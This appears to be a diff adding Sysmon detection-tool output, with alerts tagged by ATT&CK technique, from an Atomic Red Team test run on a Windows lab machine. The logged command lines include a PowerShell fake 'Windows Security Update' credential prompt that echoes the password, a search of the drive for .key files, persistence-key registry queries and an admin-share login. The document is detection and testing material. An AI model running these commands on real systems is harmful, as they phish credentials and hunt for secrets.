+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1086] PowerShell Process found,1563547641.972037,2019-07-19T18:47:21.972037+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;} )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3631
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:46:51.935
+ 747F3D96-D7DB-5D31-0000-0010B5A82A00
+ 4452
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F
+ 747F3D96-D7DB-5D31-0000-001089A52A00
+ 4256
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547611.957887,2019-07-19T18:46:51.957887+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}" )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3630
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:46:51.871
+ 747F3D96-D7DB-5D31-0000-001089A52A00
+ 4256
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "powershell.exe -command { = System.Management.Automation.Internal.Host.InternalHost.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo .GetNetworkCredential().Password;}"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,1563547579.443587,2019-07-19T18:46:19.443587+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs ) contain suspicious command ( \csc.exe),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3617
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:46:19.023
+ 747F3D96-D7BB-5D31-0000-0010E7FE2900
+ 2056
+ C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
+ 4.7.3190.0 built by: NET472REL1LAST_C
+ Visual C# Command Line Compiler
+ Microsoft® .NET Framework
+ Microsoft Corporation
+ "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /r:System.EnterpriseServices.dll /target:library /keyfile:key.snk C:\AtomicRedTeam\atomics\T1121\src\T1121.cs
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=ABAF24113034BBA4B4F4AC19D9097D36943D2E35,MD5=B87EE552626023951A7F03F2D31DA8A7,SHA256=D511363874B2A00D3DA5A20E6AE826334795A3A52AB5F8555C309D8068F5915B,IMPHASH=C4963CB3AF58DCFC863E42DD3B6FB80D
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547579.052666,2019-07-19T18:46:19.052666+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3616
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:45:56.040
+ 747F3D96-D7A4-5D31-0000-001020C62900
+ 4080
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547772.743506,2019-07-19T18:49:32.743506+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3695
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:49:32.710
+ 747F3D96-D87C-5D31-0000-0010CA5B3100
+ 956
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547772.678107,2019-07-19T18:49:32.678107+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3693
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:49:32.629
+ 747F3D96-D87C-5D31-0000-00103F573100
+ 2440
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547772.585243,2019-07-19T18:49:32.585243+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3691
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:49:32.541
+ 747F3D96-D87C-5D31-0000-0010B4523100
+ 4016
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547772.497481,2019-07-19T18:49:32.497481+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3689
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:49:32.447
+ 747F3D96-D87C-5D31-0000-0010264E3100
+ 1428
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547772.41339,2019-07-19T18:49:32.413390+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3687
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:49:32.377
+ 747F3D96-D87C-5D31-0000-001097493100
+ 1680
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547772.335446,2019-07-19T18:49:32.335446+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3685
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:49:32.284
+ 747F3D96-D87C-5D31-0000-001009453100
+ 5016
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547772.249442,2019-07-19T18:49:32.249442+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3683
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:49:32.212
+ 747F3D96-D87C-5D31-0000-00107A403100
+ 5984
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547772.180586,2019-07-19T18:49:32.180586+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3681
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:49:32.135
+ 747F3D96-D87C-5D31-0000-0010E83B3100
+ 2888
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "reg query " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547772.150327,2019-07-19T18:49:32.150327+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3680
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:49:31.675
+ 747F3D96-D87B-5D31-0000-0010D92D3100
+ 3188
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547737.570057,2019-07-19T18:48:57.570057+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /S /D /c" dir c:\ /b /s .key " ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3678
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:48:57.532
+ 747F3D96-D859-5D31-0000-001045922F00
+ 6220
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ C:\Windows\system32\cmd.exe /S /D /c" dir c:\ /b /s .key "
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D859-5D31-0000-0010FB8F2F00
+ 888
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "dir c:\ /b /s .key | findstr /e .key"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547737.557947,2019-07-19T18:48:57.557947+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "dir c:\ /b /s .key | findstr /e .key" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3677
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:48:57.502
+ 747F3D96-D859-5D31-0000-0010FB8F2F00
+ 888
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "dir c:\ /b /s .key | findstr /e .key"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547737.524876,2019-07-19T18:48:57.524876+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "echo " "ATOMICREDTEAM > %%windir%%\cert.key" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3676
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:48:57.433
+ 747F3D96-D859-5D31-0000-0010E68C2F00
+ 6524
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "echo " "ATOMICREDTEAM > %%windir%%\cert.key"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547737.466584,2019-07-19T18:48:57.466584+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3675
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:48:46.221
+ 747F3D96-D84E-5D31-0000-00102C702F00
+ 1628
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1077] Windows Admin Shares - Process - Created,1563547726.238056,2019-07-19T18:48:46.238056+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3674
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:48:41.103
+ 747F3D96-D849-5D31-0000-00103C522F00
+ 6068
+ C:\Windows\System32\net.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Net Command
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07
+ 747F3D96-D849-5D31-0000-0010E54F2F00
+ 3284
+ C:\Windows\System32\cmd.exe
+ cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1077] Windows Admin Shares - Network,1563547726.238056,2019-07-19T18:48:46.238056+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3674
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:48:41.103
+ 747F3D96-D849-5D31-0000-00103C522F00
+ 6068
+ C:\Windows\System32\net.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Net Command
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
